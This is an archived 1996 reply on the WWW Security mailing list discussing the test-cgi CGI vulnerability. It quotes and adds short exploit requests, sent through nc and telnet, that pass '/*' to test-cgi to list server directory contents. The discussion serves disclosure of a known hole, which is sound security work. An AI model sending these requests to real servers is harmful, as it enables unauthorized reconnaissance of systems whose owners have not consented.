[3571] in WWW Security List Archive


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: test-cgi

daemon@ATHENA.MIT.EDU (Chris Jason Richards)
Sun Nov 17 22:44:49 1996

To: htorgema@novice.uwaterloo.ca
cc: "John Q. Public" <scwild@ix.netcom.com>, www-security@ns2.rutgers.edu
In-reply-to: Your message of "Sun, 17 Nov 1996 08:58:56 EST."
             <Pine.OSF.3.93.961117084403.20735B-100000@novice.uwaterloo.ca> 
Date: Sun, 17 Nov 1996 19:26:09 -0600
From: Chris Jason Richards <richards@cs.tamu.edu>
Errors-To: owner-www-security@ns2.rutgers.edu

> On Sat, 16 Nov 1996, John Q. Public warned:
> 
> > Example exploit:
> > 
> > machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80
> 
> or:
> 
> machine% telnet www.host.com 80
> GET /cgi-bin/test-cgi HTTP/1.0
> Content-type: /*
> 
> <Cgi output displayed here>

Or for that matter,
machine% telnet www.host.com 80
GET /cgi-bin/test-cgi /*
Content-type: text/html

This exploits SERVER_PORT.

cjr
-- 
_______________________________________________________________________
Chris Richards                         | Texas A&M University          
richards@tamu.edu                      | Department of Computer Science
http://www.cs.tamu.edu/people/richards | Internet Publishing Services
http://grover.bre.com/                 | Internet System Programmer


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[3571] in WWW Security List Archive

Re: test-cgi

daemon@ATHENA.MIT.EDU (Chris Jason Richards)Sun Nov 17 22:44:49 1996

daemon@ATHENA.MIT.EDU (Chris Jason Richards)
Sun Nov 17 22:44:49 1996